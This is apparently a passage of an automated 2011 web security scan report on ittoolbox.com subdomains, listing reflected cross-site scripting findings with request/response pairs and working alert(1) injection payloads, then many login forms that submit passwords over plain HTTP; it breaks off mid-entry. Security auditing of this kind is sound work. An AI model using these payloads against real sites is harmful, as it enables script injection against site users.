GET /?5f46f'-alert(1)-'e6df936efc7=1 HTTP/1.1 Host: visualbasic.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 64101 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=up3ioy3qkgfjhf45mcfgsr45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Visual Basi ...[SNIP]... null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fvisualbasic.ittoolbox.com%2fDefault.aspx%3f5f46f'-alert(1)-'e6df936efc7%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.127. http://webdesign.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://webdesign.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee5ed"style%3d"x%3aexpression(alert(1))"f7194a0e58c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee5ed"style="x:expression(alert(1))"f7194a0e58c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?ee5ed"style%3d"x%3aexpression(alert(1))"f7194a0e58c=1 HTTP/1.1 Host: webdesign.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79637 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=00e2w3azkf33b545g112yh2z; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Web Design ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://webdesign.ittoolbox.com/Default.aspx?ee5ed"style="x:expression(alert(1))"f7194a0e58c=1" /> ...[SNIP]...
3.128. http://webdesign.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://webdesign.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab989'-alert(1)-'b6f9a2d805d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?ab989'-alert(1)-'b6f9a2d805d=1 HTTP/1.1 Host: webdesign.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79522 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=uxlfv345zhqpvpeuonz2kv45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Web Design ...[SNIP]... != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fwebdesign.ittoolbox.com%2fDefault.aspx%3fab989'-alert(1)-'b6f9a2d805d%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.129. http://windows.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://windows.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5da5"style%3d"x%3aexpression(alert(1))"772a40a5363 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5da5"style="x:expression(alert(1))"772a40a5363 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?e5da5"style%3d"x%3aexpression(alert(1))"772a40a5363=1 HTTP/1.1 Host: windows.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 77834 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=hru05fay2kpqom45r51hkl55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Windows Com ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://windows.ittoolbox.com/Default.aspx?e5da5"style="x:expression(alert(1))"772a40a5363=1" /> ...[SNIP]...
3.130. http://windows.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://windows.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe485'-alert(1)-'016acc0ce27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?fe485'-alert(1)-'016acc0ce27=1 HTTP/1.1 Host: windows.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 77719 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=pku3pkzbr11csbm3zmo51i45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Windows Com ...[SNIP]... r != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fwindows.ittoolbox.com%2fDefault.aspx%3ffe485'-alert(1)-'016acc0ce27%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.131. http://wireless.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://wireless.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d3b"style%3d"x%3aexpression(alert(1))"945885bc9e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56d3b"style="x:expression(alert(1))"945885bc9e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?56d3b"style%3d"x%3aexpression(alert(1))"945885bc9e1=1 HTTP/1.1 Host: wireless.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73740 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=wgga4r45yhrf2sa5hxcqbv55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Wireless Co ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://wireless.ittoolbox.com/Default.aspx?56d3b"style="x:expression(alert(1))"945885bc9e1=1" /> ...[SNIP]...
3.132. http://wireless.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://wireless.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4bba'-alert(1)-'d2be5206969 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?c4bba'-alert(1)-'d2be5206969=1 HTTP/1.1 Host: wireless.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73627 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=j4evph55wxm3fduifcqxhhew; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Wireless Co ...[SNIP]... != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fwireless.ittoolbox.com%2fDefault.aspx%3fc4bba'-alert(1)-'d2be5206969%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
4. Cleartext submission of passwordpreviousnext There are 89 instances of this issue:
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
GET / HTTP/1.1 Host: businessintelligence.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79300 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=lgzfjg45p5p4ttjbryycmjiv; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Business In ...[SNIP]... </div> <form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm"> <div> ...[SNIP]... <div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="<% =btnSignIn.ClientID %>" /></div> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://cio.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70865 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ev3vw13ts4uun2552nfwiz45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:19 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://cio.ittoolbox.com/blogs/
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /blogs/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 85344 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=sthdbdnv4isdq155nf5krjic; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:21 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://cio.ittoolbox.com/directory/
The form contains the following password field:
m$txtSignin_Password
Request
GET /directory/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 52564 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=el0hjp55tk5oie55qdseux55; path=/; HttpOnly Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.ittoolbox.com; expires=Tue, 26-Apr-2011 13:49:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:34 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://cio.ittoolbox.com/documents/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET /documents/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 28204 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=kqpydg55prajw345gnpd1jaz; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:29 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://cio.ittoolbox.com/events/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET /events/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 38997 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=uu0vpmjgqupns155oiaxug55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:32 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://cio.ittoolbox.com/groups/Default.aspx
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /groups/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 131235 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ttokbo25mimfaly03xopef55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:23 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://cio.ittoolbox.com/research/Default.aspx
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /research/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 96466 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=mqlx3145uwj1pknllf1r5455; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:29 GMT Connection: close
GET /subscriptions/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 27989 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=vzkaha55kglahd45pvrgqp2s; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:33 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://cloud.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: cloud.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 56007 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=edr0xeykfwnzlf55wgzg3zyo; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:35 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://crm.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: crm.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 82725 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=2ge150zsf5orj4451zm2nlzm; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:39 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://database.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: database.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 84329 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ra1d4q2rs54sn03stt4bip55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:38 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://datacenter.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: datacenter.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 60090 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=wgr3vvq5eg30jq45klsivcfv; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:41 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://datawarehouse.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: datawarehouse.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72791 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ivrlt045uzzhvb45t5knzy55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:42 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://eai.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: eai.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71618 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=4d5wgz45zmrk1tj0f23ykr55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:42 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://emergingtech.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: emergingtech.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47575 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=vhyrxg55jlanffvxx24ekzek; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:43 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://erp.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: erp.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 74629 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=11lky4ffifxs05zpvlu4qv55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:46 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://finance.toolbox.com/default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: finance.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 81717 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:49 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://hardware.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: hardware.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 78653 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3wjpn4yajv3hcfa0fidd3prk; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:50 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://infor.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: infor.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 54154 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=laxlg3yxtwdispubbh1xwd45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:00 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://it.toolbox.com/groups/
The form contains the following password field:
m$txtSignin_Password
Request
GET /groups/ HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79052 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Groups
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://java.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: java.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 59140 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=oyzpf135dvjl5u4503tynefb; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:01 GMT Connection: close
GET / HTTP/1.1 Host: knowledgemanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71256 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=b5wett3jdmxpvtvb4e4glymn; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:06 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://linux.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: linux.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
